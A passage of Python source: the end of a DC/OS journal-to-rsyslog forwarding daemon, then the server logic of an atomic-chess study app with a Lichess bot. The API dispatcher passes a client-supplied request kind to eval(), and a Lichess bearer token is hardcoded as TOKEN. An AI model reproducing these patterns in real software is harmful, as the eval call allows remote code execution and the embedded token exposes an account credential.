parser.add_argument('--rsyslog-port', default=61093, help='System Rsyslog Port')
parser.add_argument('--buffer-read-size', default=1024, help='TCP Buffer read size')
parser.add_argument('-v', '--verbose', default=False, action='store_true', help='Verbose mode')
parser.add_argument('-q', '--quiet', default=False, action='store_true', help='Quiet mode')
args = parser.parse_args()
# Daemonize
# Close stdin
os.close(0)
# Close stdout
os.close(1)
# Close stderr
os.close(2)
# Logger configuration
log_level=0
if args.verbose:
log_level=logging.DEBUG
elif args.quiet:
log_level=logging.ERROR
else:
log_level=logging.INFO
logger = logging.getLogger(__name__)
journald_handler = JournaldLogHandler()
journald_handler.setFormatter(logging.Formatter("[%(levelname)s](%(asctime)s): %(message)s"))
logger.addHandler(journald_handler)
logger.setLevel(log_level)
logger.debug("##-> DC/OS Journal IP: %s", args.dcos_journal_ip)
logger.debug("##-> DC/OS Journal Port: %d", args.dcos_journal_port)
logger.debug("##-> Rsyslog IP: %s", args.rsyslog_ip)
logger.debug("##-> Rsyslog Port: %d", args.rsyslog_port)
# Run Daemon
run(args.dcos_journal_ip, args.dcos_journal_port, args.rsyslog_ip, args.rsyslog_port, args.buffer_read_size)
|
serverlogic.py
|
###################################################################
from traceback import print_exc as pe
import uuid
import time
import os
from threading import Thread
import requests
import json
import chess
import random
###################################################################
import utils.file
from utils.logger import log
from utils.http import geturl
from utils.study import Study, DEFAULT_MAX_PLIES, Book, BookMove, BookPosition, LichessGame, getvariantboard, get_zobrist_key_hex
from utils.cryptography import encryptalphanum, decryptalphanum
from utils.file import read_json_from_fdb, write_json_to_fdb, delfdb, read_json_from_fdb, fdb
from utils.engine import UciEngine, AnalyzeJob, TimeControl
from utils.config import SERVER_URL, KEEP_ALIVE, IS_PROD, ENGINE_WORKING_DIR, ENGINE_EXECUTABLE_NAME, FREE_ANALYSIS
from utils.logger import SystemLog
from utils.http import posturl
###################################################################
SERVERLOGIC_VERBOSE = True
SCAN_PLAYER_LIST = os.environ.get("SCANPLAYERS", "jwaceking,Wolfram_EP,letzplaykrazy,HigherBrainPattern,Natso,sutcunuri,kreedz,Xeransis,Illion")
SCAN_PLAYER_LIST += os.environ.get("EXTRAPLAYERS", "")
MAX_BOOK_GAMES = int(os.environ.get("MAXBOOKGAMES", 500))
PRE_MIN_PLIES = int(os.environ.get("PREMINPLIES", 10))
MAX_BOOK_PLIES = int(os.environ.get("MAXBOOKPLIES", 30))
PRE_FILTER_VERSION = int(os.environ.get("PREFILTERVERION", 1))
BOOK_FILTER_VERSION = int(os.environ.get("BOOKFILTERVERION", 2))
MAX_DOWNLOAD_GAMES = int(os.environ.get("MAXDOWNLOADGAMES", 100))
PRE_MIN_RATING = int(os.environ.get("PREMINRATING", 2200))
BOOK_MIN_RATING = int(os.environ.get("BOOKMINRATING", 2200))
MAX_NDJSON_SIZE = int(os.environ.get("MAXNDJSONSIZE", 1000))
BUILD_BOOK_DELAY = int(os.environ.get("BUILDBOOKDELAY", 6 * 3600))
###################################################################
def createuuid():
return uuid.uuid1().hex
###################################################################
class FirestoreDb(utils.file.Db):
def __init__(self):
super(FirestoreDb, self).__init__()
db = FirestoreDb()
bot = None
###################################################################
mainengine = None
mainenginelog = SystemLog()
def newengine_func():
global mainengine, mainenginelog
if mainengine:
mainengine.kill()
mainengine = UciEngine(ENGINE_WORKING_DIR(), ENGINE_EXECUTABLE_NAME(), "mainengine", mainenginelog)
mainengine.open()
###################################################################
PRIVILEGES = [
"admin",
"analyze"
]
class User():
def __init__(self, blob = {}):
if not blob:
blob = {}
self.fromblob(blob)
def canbasic(self, privilege):
envname = "CAN" + privilege.upper()
if envname in os.environ:
canstr = os.environ[envname]
canlist = canstr.split(",")
if self.uid in canlist:
return True
return False
def can(self, privilege):
if self.canbasic("admin"):
return True
return self.canbasic(privilege)
def fromblob(self, blob):
self.uid = blob.get("uid", "anonuser")
self.code = encryptalphanum(self.uid)
self.username = blob.get("username", "Anonymous")
self.createdat = blob.get("createdat", time.time())
self.verifiedat = blob.get("verifiedat", None)
self.lastactiveat = blob.get("lastactiveat", time.time())
self.verification = blob.get("verification", None)
self.privileges = {}
for privilege in PRIVILEGES:
self.privileges[privilege] = self.can(privilege)
def toblob(self):
return {
"uid": self.uid,
"code": self.code,
"username": self.username,
"createdat": self.createdat,
"verifiedat": self.verifiedat,
"lastactiveat": self.lastactiveat,
"verification": self.verification,
"privileges": self.privileges
}
def dbpath(self):
return "users/" + self.uid
def fromdb(self):
self.fromblob(db.getpath(self.dbpath()))
def storedb(self):
db.setdoc(self.dbpath(), self.toblob())
def indb(self):
return db.getpath(self.dbpath())
def __repr__(self):
return f"< user [ {self.uid} | {self.username} | admin : {self.can('admin')} ] >"
###################################################################
class Req():
def __init__(self, reqobj):
self.reqobj = reqobj
self.queryparams = reqobj.get("queryparams", {})
self.task = self.queryparams.get("task", None)
self.kind = reqobj.get("kind", "dummy")
self.userblob = reqobj.get("user", {})
self.user = User(self.userblob)
self.verifyusername = reqobj.get("verifyusername", None)
self.title = reqobj.get("title", None)
self.variantkey = reqobj.get("variantkey", "standard")
self.id = reqobj.get("id", None)
self.nodeid = reqobj.get("nodeid", None)
self.algeb = reqobj.get("algeb", None)
self.pgn = reqobj.get("pgn", None)
self.moves = reqobj.get("moves", None)
self.drawings = reqobj.get("drawings", None)
self.message = reqobj.get("message", None)
self.nags = reqobj.get("nags", None)
self.duration = reqobj.get("duration", None)
self.weightkind = reqobj.get("weightkind", "me")
self.weight = reqobj.get("weight", 0)
self.maxplies = reqobj.get("maxplies", DEFAULT_MAX_PLIES)
self.ignorecomments = reqobj.get("ignorecomments", False)
self.ignoredrawings = reqobj.get("ignoredrawings", False)
self.ignoretrainweights = reqobj.get("ignoretrainweights", False)
self.success = reqobj.get("success", 0)
self.player = reqobj.get("player", None)
self.command = reqobj.get("command", None)
self.fen = reqobj.get("fen", None)
self.multipv = reqobj.get("multipv", 1)
self.zobristkeyhex = reqobj.get("zobristkeyhex", None)
self.blob = reqobj.get("blob", None)
self.username = reqobj.get("username", None)
self.initial = reqobj.get("initial", None)
self.increment = reqobj.get("increment", None)
self.rated = reqobj.get("rated", None)
self.color = reqobj.get("color", None)
if SERVERLOGIC_VERBOSE:
log(self, "warning")
if not db.getpath("users/" + self.user.uid):
self.user = User()
uid = createuuid()
self.user.uid = uid
self.user.createdat = time.time()
if SERVERLOGIC_VERBOSE:
log(f"< anonuser in request, creating new user < {uid} > >", "error")
if self.user.indb():
self.user.fromdb()
if SERVERLOGIC_VERBOSE:
log("< user found in db >", "success")
self.user.lastactiveat = time.time()
self.user.storedb()
def studiespath(self):
return "users/" + self.user.uid + "/studies"
def studypath(self, study):
return self.studiespath() + "/" + study.id
def res(self, resobj):
if not ("user" in resobj):
resobj["user"] = self.user.toblob()
return resobj
def __repr__(self):
return f"< request [ {self.kind} | {self.queryparams} | {self.user} ] >"
###################################################################
###################################################################
# json api handlers
def dummy(req):
return {
"kind": "dummydone"
}
def connected(req):
if req.task == "importstudy":
importstudy(req)
return {
"kind": "connectedack",
"freeanalysis": FREE_ANALYSIS(),
"players": SCAN_PLAYER_LIST.split(",")
}
def login(req):
req.user.verification = {
"username": req.verifyusername,
"code": createuuid()
}
req.user.storedb()
return {
"kind": "login"
}
def verify(req):
username = req.user.verification["username"]
code = req.user.verification["code"]
if SERVERLOGIC_VERBOSE:
log(f"< verifying user < {username} > code < {code} > >", "info")
try:
content = geturl("https://lichess.org/@/" + username)
if SERVERLOGIC_VERBOSE:
log(f"< received content < {len(content)} characters > >", "info")
if code in content:
if SERVERLOGIC_VERBOSE:
log(f"< code found in content >", "success")
req.user.username = username
req.user.verifiedat = time.time()
req.user.verification = None
allusers = db.getpath("users")
for id, userblob in allusers.items():
if userblob["username"] == username:
newuid = userblob["uid"]
if SERVERLOGIC_VERBOSE:
log(f"< user already exists, changing uid to < {newuid} > >", "warning")
req.user.uid = newuid
break
req.user.storedb()
return {
"kind": "verified"
}
except:
pe()
if SERVERLOGIC_VERBOSE:
log(f"< there was a problem verifying user >", "error")
if SERVERLOGIC_VERBOSE:
log(f"< verification failed >", "error")
return {
"kind": "verificationfailed",
"alert": {
"msg": "Verification failed !",
"kind": "error"
}
}
def cancelverification(req):
req.user.verification = None
req.user.storedb()
return {
"kind": "verificationcanceled"
}
def getstudies(req):
if not db.getpath(req.studiespath()):
log("< no studies, creating default >", "warning")
defaultstudy = Study({
"selected": True
})
db.setdoc(req.studypath(defaultstudy), defaultstudy.toblob(nodelist = True))
studies = db.getpath(req.studiespath())
studiesblob = {}
for id, studyblob in studies.items():
study = Study(studyblob)
studiesblob[id] = study.toblob(nodelist = study.selected)
return {
"kind": "setstudies",
"studies": studiesblob
}
def unselectstudies(req, selectid = None, nodeid = None):
studies = db.getpath(req.studiespath())
if not studies:
return
for id, studyblob in studies.items():
study = Study(studyblob)
if study.selected:
if SERVERLOGIC_VERBOSE:
log(f"< unselecting study < {id} > >", "info")
study.selected = False
storestudy(req, study)
if selectid == id:
if SERVERLOGIC_VERBOSE:
log(f"< selecting study < {id} | {nodeid} > >", "info")
study.selected = True
if nodeid:
study.selectnodebyid(nodeid)
storestudy(req, study)
def createstudy(req):
id = createuuid()
study = Study({
"title": req.title,
"variantkey": req.variantkey,
"id": id,
"selected": True
})
unselectstudies(req)
storestudy(req, study)
if SERVERLOGIC_VERBOSE:
log(f"< created study < {req.title} | {id} > >", "success")
return {
"kind": "studycreated"
}
def clonestudy(req):
log(f"< cloning study < {req.id} > >", "info")
study = getstudy(req)
if not study:
return {
"kind": "clonestudyfailed",
"status": "no such study"
}
study.id = createuuid()
study.createdat = time.time()
req.id = study.id
storestudy(req, study)
unselectstudies(req, selectid = req.id)
if SERVERLOGIC_VERBOSE:
log(f"< cloned study < {req.id} > >", "success")
return {
"kind": "studycloned"
}
def deletestudy(req):
if req.id == "default":
return {
"kind": "studydeletefailed",
"status": "default study cannot be deleted",
"alert": {
"msg": "The default study cannot be deleted !",
"kind": "error"
}
}
unselectstudies(req, selectid = "default")
study = Study({"id": req.id})
db.deletedoc(req.studypath(study))
return {
"kind": "studydeleted"
}
def getstudy(req):
study = Study({"id": req.id})
blob = db.getpath(req.studypath(study))
if not blob:
return None
study = Study(blob)
return study
def storestudy(req, study):
db.setdoc(req.studypath(study), study.toblob(nodelist = True))
def editstudytitle(req):
if req.id == "default":
return {
"kind": "editstudytitlefailed",
"status": "default study's title cannot be edited",
"alert": {
"msg": "The default study's title cannot be edited !",
"kind": "error"
}
}
study = getstudy(req)
if not study:
return {
"kind": "editstudytitlefailed",
"status": "fatal no such study",
"alert": {
"msg": "The default study's title cannot be edited !",
"kind": "error"
}
}
study.title = req.title
storestudy(req, study)
return {
"kind": "studytitleedited"
}
def selectstudy(req, nodeid = None):
unselectstudies(req, selectid = req.id, nodeid = nodeid)
return {
"kind": "studyselected"
}
def makealgebmove(req):
log(f"< making algeb move < {req.algeb} | {req.id} > >", "info")
study = getstudy(req)
study.makealgebmove(req.algeb)
storestudy(req, study)
return {
"kind": "algebmovemade",
"setstudy": study.toblob(nodelist = True)
}
def setcurrentnode(req):
log(f"< setting current node < {req.id} | {req.nodeid} > >", "info")
study = getstudy(req)
if study.selectnodebyid(req.nodeid):
storestudy(req, study)
return {
"kind": "currentnodeset",
"currentnodeid": study.currentnodeid
}
else:
return {
"kind": "setcurrentnodefailed",
"nodeid": req.nodeid
}
def parsepgn(req):
log(f"< parsing pgn < {req.id} | {req.pgn} > >", "info")
study = getstudy(req)
study.parsepgn(req.pgn)
storestudy(req, study)
return {
"kind": "pgnparsed",
"setstudy": study.toblob(nodelist = True)
}
def mergemoves(req):
log(f"< merging moves < {req.id} | max plies {req.maxplies} | ignore comments {req.ignorecomments} | ignore drawings {req.ignoredrawings} | ignore trainweights {req.ignoretrainweights} | moves {req.moves} > >", "info")
study = getstudy(req)
study.mergemoves(req.moves, req.maxplies, ignorecomments = req.ignorecomments, ignoredrawings = req.ignoredrawings, ignoretrainweights = req.ignoretrainweights)
storestudy(req, study)
return {
"kind": "movesmerged",
"setstudy": study.toblob(nodelist = True)
}
def setdrawings(req):
log(f"< setting drawings < {req.id} | {req.drawings} > >", "info")
study = getstudy(req)
study.setdrawings(req.drawings)
storestudy(req, study)
return {
"kind": "drawingsset",
"pgn": study.reportpgn()
}
def setsuccess(req):
log(f"< setting success < {req.id} | {req.nodeid} | {req.success} > >", "info")
study = getstudy(req)
if study.setsuccess(req.nodeid, req.success):
storestudy(req, study)
return {
"kind": "successset",
"success": req.success
}
else:
return {
"kind": "setsuccessfailed"
}
def savemessage(req):
log(f"< save message < {req.id} | {req.nodeid} | {req.message} > >", "info")
study = getstudy(req)
if study.setmessage(req.nodeid, req.message):
storestudy(req, study)
return {
"kind": "messagesaved",
"message": req.message,
"pgn": study.reportpgn()
}
else:
return {
"kind": "messagesavefailed"
}
def savenags(req):
log(f"< save nags < {req.id} | {req.nodeid} | {req.nags} > >", "info")
study = getstudy(req)
if study.setnags(req.nodeid, req.nags):
storestudy(req, study)
return {
"kind": "nagssaved",
"nags": req.nags,
"pgn": study.reportpgn()
}
else:
return {
"kind": "nagssavefailed"
}
def settrainweight(req):
log(f"< set train weight < {req.id} | {req.nodeid} | {req.weightkind} | {req.weight} > >", "info")
study = getstudy(req)
if study.settrainweight(req.nodeid, req.weightkind, req.weight):
storestudy(req, study)
return {
"kind": "trainweightset",
"weightkind": req.weightkind,
"weight": req.weight,
"pgn": study.reportpgn()
}
else:
return {
"kind": "settrainweightfailed"
}
def saveduration(req):
log(f"< save duration < {req.id} | {req.nodeid} | {req.duration} > >", "info")
study = getstudy(req)
if study.setduration(req.nodeid, req.duration):
storestudy(req, study)
return {
"kind": "durationsaved",
"duration": req.duration
}
else:
return {
"kind": "durationsavefailed"
}
def flipstudy(req):
log(f"< flipping < {req.id} > >", "info")
study = getstudy(req)
study.setflip(not study.flip)
storestudy(req, study)
return {
"kind": "studyflipped",
"setstudy": study.toblob(nodelist = True)
}
def reset(req):
log(f"< reset < {req.id} > >", "info")
study = getstudy(req)
study.reset()
storestudy(req, study)
return {
"kind": "resetdone",
"setstudy": study.toblob(nodelist = True)
}
def selectnodebyid(req):
log(f"< selecting node by id < {req.id} | {req.nodeid} > >", "info")
study = getstudy(req)
study.selectnodebyid(req.nodeid)
storestudy(req, study)
return {
"kind": "nodeselectedbyid",
"setstudy": study.toblob(nodelist = True)
}
def back(req):
log(f"< back < {req.id} > >", "info")
study = getstudy(req)
study.back()
storestudy(req, study)
return {
"kind": "backdone",
"setstudy": study.toblob(nodelist = True)
}
def delete(req):
log(f"< deleted < {req.id} > >", "info")
study = getstudy(req)
study.delete()
storestudy(req, study)
return {
"kind": "deletedone",
"setstudy": study.toblob(nodelist = True)
}
def tobegin(req):
log(f"< tobegin < {req.id} > >", "info")
study = getstudy(req)
study.tobegin()
storestudy(req, study)
return {
"kind": "tobegindone",
"setstudy": study.toblob(nodelist = True)
}
def forward(req):
log(f"< forward < {req.id} > >", "info")
study = getstudy(req)
study.forward()
storestudy(req, study)
return {
"kind": "forwarddone",
"setstudy": study.toblob(nodelist = True)
}
def toend(req):
log(f"< toend < {req.id} > >", "info")
study = getstudy(req)
study.toend()
storestudy(req, study)
return {
"kind": "toenddone",
"setstudy": study.toblob(nodelist = True)
}
def importstudy(req):
usercode = req.queryparams["usercode"]
studyid = req.queryparams["studyid"]
nodeid = req.queryparams["nodeid"]
uid = decryptalphanum(usercode)
log(f"< importing study < {usercode} | {uid} | {studyid} | {nodeid} > >", "info")
userpath = "users/" + uid
if not db.getpath(userpath):
log(f"< import user does not exist < {uid} > >", "error")
return
studypath = userpath + "/studies/" + studyid
studyblob = db.getpath(studypath)
if not studyblob:
log(f"< import study does not exist < {studyid} > >", "error")
return
if uid == req.user.uid:
log(f"< importing own study < {uid} | {nodeid} > >", "warning")
req.id = studyid
selectstudy(req, nodeid = nodeid)
return
log(f"< importing study < {studyid} | {nodeid} > >", "info")
study = Study(studyblob)
req.id = studyid
storestudy(req, study)
selectstudy(req, nodeid = nodeid)
def enginecommand(req):
global mainengine
if req.user.can("analyze"):
mainengine.send_line(req.command)
return {
"kind": "enginecommandissued"
}
else:
return {
"kind": "enginecommandfailed",
"status": "not authorized"
}
def analyze(req):
global mainengine
if req.user.can("analyze") or FREE_ANALYSIS():
mainengine.analyze(AnalyzeJob(req.fen, multipv = req.multipv, variantkey = req.variantkey))
return {
"kind": "analyzestarted"
}
else:
return {
"kind": "analyzefailed",
"status": "not authorized"
}
def stopanalyze(req):
global mainengine
if req.user.can("analyze") or FREE_ANALYSIS():
mainengine.stopanalyze()
return {
"kind": "analyzestopped"
}
else:
return {
"kind": "stopanalyzefailed",
"status": "not authorized"
}
def newengine(req):
if req.user.can("analyze"):
newengine_func()
return {
"kind": "newenginedone"
}
else:
return {
"kind": "newenginefailed",
"status": "not authorized"
}
def getanalysisinfo(req):
fdbpath = f"analysisinfo/{req.variantkey}/{req.zobristkeyhex}"
log(f"< getting analysis info < {fdbpath} > >", "info")
blob = read_json_from_fdb(fdbpath, None)
return {
"kind": "analysisinfo",
"blob": blob
}
def getanalysisbook(req):
fdbpath = f"analysisbook/{req.variantkey}/{req.zobristkeyhex}"
log(f"< getting analysis book < {fdbpath} > >", "info")
blob = read_json_from_fdb(fdbpath, None)
return {
"kind": "analysisbook",
"zobristkeyhex": req.zobristkeyhex,
"blob": blob
}
def saveanalysisbook(req):
if req.user.can("admin"):
fdbpath = f"analysisbook/{req.variantkey}/{req.zobristkeyhex}"
log(f"< saving analysis book < {fdbpath} > >", "info")
write_json_to_fdb(fdbpath, req.blob)
return {
"kind": "analysisbooksaved"
}
else:
return {
"kind": "saveanalysisbookfailed",
"status": "not authorized"
}
def reloadanalysisbook(req):
global bot
if req.user.can("admin"):
log(f"< reload analysis book >", "info")
bot.loadanalysisbook()
return {
"kind": "analysisbookreloaded"
}
else:
return {
"kind": "reloadnalysisbookfailed",
"status": "not authorized"
}
def challenge(req):
global bot
if req.user.can("admin"):
log(f"< challenge | {req.username} | {req.initial} | {req.increment} | {req.rated} | {req.color} >", "info")
status = bot.challenge(req.username, req.initial, req.increment, req.rated, req.color)
print("challenge status", status)
return {
"kind": "challengeissued",
"status": status
}
else:
return {
"kind": "challengefailed",
"status": "not authorized"
}
###################################################################
def jsonapi(reqobj):
req = Req(reqobj)
try:
resobj = eval(f"{req.kind}(req)")
except:
pe()
resobj = {
"kind": "unknownapirequest"
}
return req.res(resobj)
###################################################################
TOKEN = "L8GHblP1Wc57Oegi"
def ndjsonpath(player):
return f"{player}_ndjson"
def nowms():
return int(time.time() * 1000)
def gameexporturl(player, since = 0, until = None, max = MAX_DOWNLOAD_GAMES):
if not until:
until = nowms()
return f"https://lichess.org//api/games/user/{player}?variant=atomic&max={max}&since={since}&until={until}"
def prefilterok(g):
if not g.perf == "atomic":
return False
if ( g.white.rating < PRE_MIN_RATING ) or ( g.black.rating < PRE_MIN_RATING ):
return False
if g.playeropp.ailevel or ( g.playeropp.title == "BOT" ):
return False
if len(g.moves) < PRE_MIN_PLIES:
return False
if not g.rated:
return False
return True
def rationalizeplayerdata(ndjson):
#print("rationalizing player data", len(ndjson))
ids = {}
filtered = []
for obj in ndjson:
if ( "id" in obj ) and ( "lastMoveAt" in obj ) and ( "createdAt" in obj ):
id = obj["id"]
if not id in ids:
ids[id] = True
filtered.append(obj)
else:
print("duplicate id", id)
filtered.sort(key = lambda x: x["lastMoveAt"], reverse = True)
if len(filtered) > MAX_NDJSON_SIZE:
filtered = filtered[:MAX_NDJSON_SIZE]
#print("rationalized player data", len(filtered))
return filtered
def exportgames(kind, playerndjson):
print("export", kind, playerndjson)
if ( kind == "old" ) and ( len(playerndjson.ndjson) >= MAX_NDJSON_SIZE ):
#print("cache full, not exporting")
return
since = playerndjson.since
until = playerndjson.until
max = MAX_DOWNLOAD_GAMES
if kind == "new":
until = nowms()
if playerndjson.since > 0:
max = 10 * max
if kind == "old":
since = 0
until = playerndjson.until
#print("exporting", since, until, max)
r = requests.get(gameexporturl(playerndjson.player, since = since, until = until, max = max), headers = {
"Authorization": f"Bearer {TOKEN}",
"Accept": "application/x-ndjson"
}, stream = True)
cnt = 0
found = 0
start = time.time()
for line in r.iter_lines():
try:
line = line.decode("utf-8")
obj = json.loads(line)
cnt += 1
if ( "createdAt" in obj ) and ( "lastMoveAt" in obj ):
createdat = obj["createdAt"]
if createdat < playerndjson.until:
playerndjson.until = createdat
g = LichessGame(obj, playerndjson.player)
if(prefilterok(g)):
playerndjson.ndjson.append(obj)
found += 1
if g.lastmoveat > playerndjson.since:
playerndjson.since = g.lastmoveat
if ( cnt % 20 ) == 0:
print("read cnt", cnt, "found", found, "rate", cnt / (time.time() - start))
except:
print("problem loading games")
if found > 0:
#print("writing player", playerndjson.player)
playerndjson.ndjson = rationalizeplayerdata(playerndjson.ndjson)
else:
#print("up to date", playerndjson.player)
pass
playerndjson.storedb()
def bookfilterok(g):
return ( g.white.rating >= BOOK_MIN_RATING ) and ( g.black.rating >= BOOK_MIN_RATING )
def bookpath(player):
return f"{player}_book"
class PlayerNdjson:
def __init__(self, player, blob = {}):
self.fromblob(player, blob)
def fromblob(self, player, blob = {}):
self.player = player
self.filterversion = blob.get("filterversion", 0)
self.ndjson = blob.get("ndjson", [])
self.since = blob.get("since", 0)
self.until = blob.get("until", nowms())
def fromdb(self):
blob = read_json_from_fdb(ndjsonpath(self.player), {})
self.fromblob(self.player, blob)
return self
def toblob(self):
return {
"player": self.player,
"filterversion": self.filterversion,
"since": self.since,
"until": self.until,
"ndjson": self.ndjson
}
def storedb(self):
#print("storing ndjson", self)
write_json_to_fdb(ndjsonpath(self.player), self.toblob())
return self
def __repr__(self):
return f"< player ndjson < {self.player} since {self.since} until {self.until} size {len(self.ndjson)} > >"
def buildplayerbook(player, force = False):
defaultbookblob = {
"name": player
}
bookblob = read_json_from_fdb(bookpath(player), defaultbookblob)
book = Book(bookblob)
if ( BOOK_FILTER_VERSION > book.filterversion ) or force:
book.gameids = {}
book.positions = {}
book.filterversion = BOOK_FILTER_VERSION
playerndjson = PlayerNdjson(player).fromdb()
ndjson = playerndjson.ndjson
#print("building", player)
cnt = 0
found = 0
filtered = []
for gameblob in ndjson:
cnt += 1
g = LichessGame(gameblob, player)
if bookfilterok(g):
filtered.append(g)
found += 1
if ( cnt % 1000 ) == 0:
#print("filtering", cnt, "found", found)
pass
#print("filtering done, found", found)
if len(filtered) > MAX_BOOK_GAMES:
filtered = filtered[:MAX_BOOK_GAMES]
cnt = 0
for g in filtered:
cnt += 1
#print("building", cnt, "of", len(filtered), g.white.name, g.black.name)
if g.id in book.gameids:
pass
#print("up to date")
else:
book.gameids[g.id] = True
board = getvariantboard("atomic")
zkh = get_zobrist_key_hex(board)
movecnt = 0
for san in g.moves:
move = board.parse_san(san)
if movecnt >= MAX_BOOK_PLIES:
break
movecnt += 1
uci = move.uci()
if zkh in book.positions:
pos = book.positions[zkh]
else:
pos = BookPosition({
"zobristkeyhex": zkh
})
if uci in pos.moves:
bookmove = pos.moves[uci]
else:
bookmove = BookMove({
"uci": uci,
"san": san
})
if board.turn == g.mecolor:
bookmove.plays += 1
if g.meresult == 1:
bookmove.wins += 1
elif g.meresult == 0:
bookmove.losses += 1
else:
bookmove.draws += 1
pos.moves[uci] = bookmove
pos.addtopgame(g.excerpt())
book.positions[zkh] = pos
board.push(move)
zkh = get_zobrist_key_hex(board)
print("added", movecnt, "moves of", g.white.name, g.black.name)
write_json_to_fdb(bookpath(player), book.toblob())
def buildbooks():
BUILD_PLAYERS = SCAN_PLAYER_LIST.split(",")
for player in BUILD_PLAYERS:
buildplayerbook(player)
time.sleep(5)
def scanplayerstarget():
SCAN_PLAYERS = SCAN_PLAYER_LIST.split(",")
#print("scan", SCAN_PLAYERS)
while True:
for player in SCAN_PLAYERS:
#print("scanning", player)
playerndjson = PlayerNdjson(player).fromdb()
if PRE_FILTER_VERSION > playerndjson.filterversion:
#print("rebuild ndjson")
playerndjson.filterversion = PRE_FILTER_VERSION
playerndjson.ndjson = []
playerndjson.ndjson = rationalizeplayerdata(playerndjson.ndjson)
exportgames("new", playerndjson)
exportgames("old", playerndjson)
time.sleep(5)
buildbooks()
time.sleep(BUILD_BOOK_DELAY)
###################################################################
def keepalivetarget():
for i in range(KEEP_ALIVE):
time.sleep(600)
geturl(SERVER_URL, verbose = False)
###################################################################
def enginetesttarget():
time.sleep(5)
sl = SystemLog()
e = UciEngine(ENGINE_WORKING_DIR(), ENGINE_EXECUTABLE_NAME(), "mainengine", sl)
e.open()
time.sleep(5)
e.send_line("uci")
time.sleep(5)
e.kill()
print(sl)
def initenginetarget():
global mainengine
#print("initializing engine")
newengine_func()
#print("initializing engine done")
class Bot:
def challenge(self, username, initial, increment, rated, color):
ratedstr = "true"
if not rated:
ratedstr = "false"
fields = {
"variant": self.variant,
"clock.limit": str(initial),
"clock.increment": str(increment),
"rated": ratedstr,
"color": color
}
print("making challenge", fields)
res = posturl(f"https://lichess.org//api/challenge/{username}", asjson = True, headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/json"
}, fields = fields)
return res
def newengine(self):
if self.engine:
self.engine.kill()
self.engine = UciEngine(ENGINE_WORKING_DIR(), ENGINE_EXECUTABLE_NAME(), "botengine", None)
self.engine.open()
def __init__(self, token = os.environ.get("BOTTOKEN", None), username = os.environ.get("BOTUSERNAME", "AtomicVsEngineBot"), variant = "atomic"):
self.token = token
if not self.token:
print("no bot token")
return
self.username = username
self.variant = variant
self.analysisbook = None
self.playing = False
self.gameticks = {}
self.engine = None
self.newengine()
self.loadanalysisbook()
Thread(target = self.streameventstarget).start()
def loadanalysisbook(self):
self.analysisbook = fdb.reference(f"analysisbook/{self.variant}").get()
if self.analysisbook:
#print("analysis book loaded", len(list(self.analysisbook.keys())), "position(s)")
pass
def monitoreventstreamtarget(self, r):
while True:
if ( time.time() - self.lasttick ) > 30:
print("event stream timeout")
r.close()
return
time.sleep(10)
def challengeaction(self, kind, id):
print(kind, "challenge", id)
res = posturl(f"https://lichess.org//api/challenge/{id}/{kind}", asjson = True, headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/json"
})
print(kind, "challenge response", res)
def getbookmove(self, board):
try:
zkh = get_zobrist_key_hex(board)
if zkh in self.analysisbook:
posblob = json.loads(self.analysisbook[zkh])
if "movesblob" in posblob:
movesblob = posblob["movesblob"]
ucilist = []
for moveblob in movesblob:
for i in range(int(moveblob["weight"])):
ucilist.append(moveblob["uci"])
index = random.randint(0, len(ucilist) - 1)
seluci = ucilist[index]
return seluci
else:
return None
else:
return None
except:
print("problem finding book move")
return None
def makemove(self, gameid, uci):
#print("making move", gameid, uci)
res = posturl(f"https://lichess.org//api/bot/game/{gameid}/move/{uci}", asjson = True, headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/json"
})
print("make move response", res)
def getenginemove(self, board, initialboard, moves = [], timecontrol = None, ponder = None):
legalmoves = board.legal_moves
if len(list(legalmoves)) == 0:
print("no legal moves")
return ( None, None )
ponderok = False
if len(moves) > 0:
if moves[-1] == ponder:
ponderok = True
print("ponder ok")
moveoverhead = 0
if timecontrol:
mytime = timecontrol.wtime
if self.color == chess.BLACK:
mytime = timecontrol.btime
if mytime < 30000:
moveoverhead = os.environ.get("MOVEOVERHEAD", 1500)
self.engine.setoption("Move Overhead", moveoverhead)
enginestarted = time.time()
if ponderok:
( bestmove, ponder ) = self.engine.awaitponder()
else:
self.engine.doanalyze(AnalyzeJob(fen = initialboard.fen(), moves = moves, multipv = 1, variantkey = self.variant, timecontrol = timecontrol))
if not timecontrol:
print("waiting for move")
time.sleep(2)
self.engine.stop()
else:
pass
( bestmove, ponder ) = self.engine.awaitbestmove()
elapsed = time.time() - enginestarted
if timecontrol:
if self.color == chess.WHITE:
timecontrol.wtime -= int(elapsed * 1000)
if timecontrol.wtime < 0:
timecontrol.wtime = 50
else:
timecontrol.btime -= int(elapsed * 1000)
if timecontrol.btime < 0:
timecontrol.btime = 50
if ponder:
moves.append(bestmove)
moves.append(ponder)
self.engine.doanalyze(AnalyzeJob(fen = initialboard.fen(), moves = moves, multipv = 1, variantkey = self.variant, timecontrol = timecontrol), ponder = True)
return ( bestmove, ponder )
def monitorplaygametarget(self, r, gameid):
while True:
if ( time.time() - self.gameticks[gameid] ) > 30:
print("play game timeout", gameid)
r.close()
return
time.sleep(10)
def playgame(self, event):
print("playing game", event)
self.playing = True
self.ponder = None
try:
game = event["game"]
gameid = game["id"]
r = requests.get(f"https://lichess.org//api/bot/game/stream/{gameid}", headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/x-ndjson"
}, stream = True)
self.gameticks[gameid] = time.time()
Thread(target = self.monitorplaygametarget, args = (r, gameid)).start()
try:
for line in r.iter_lines():
try:
line = line.decode("utf-8")
self.gameticks[gameid] = time.time()
self.lasttick = time.time()
event = json.loads(line)
kind = event["type"]
if kind == "gameFull":
self.initialfen = event["initialFen"]
self.initialboard = getvariantboard(self.variant)
if not ( self.initialfen == "startpos" ):
self.initialboard.set_fen(self.initialfen)
self.whiteid = event["white"]["id"]
self.blackid = event["black"]["id"]
if self.whiteid == self.username.lower():
self.color = chess.WHITE
elif self.blackid == self.username.lower():
self.color = chess.BLACK
else:
print("could not find bot color")
break
print("game started", self.whiteid, self.blackid, self.color, self.initialfen)
if ( kind == "gameFull" ) or ( kind == "gameState" ):
try:
if kind == "gameFull":
state = event["state"]
else:
state = event
movesstr = state["moves"]
moves = []
if len(movesstr) > 0:
moves = movesstr.split(" ")
board = self.initialboard.copy()
for uci in moves:
move = chess.Move.from_uci(uci)
board.push(move)
if board.turn == self.color:
bookmove = self.getbookmove(board)
if bookmove:
print("making book move", bookmove)
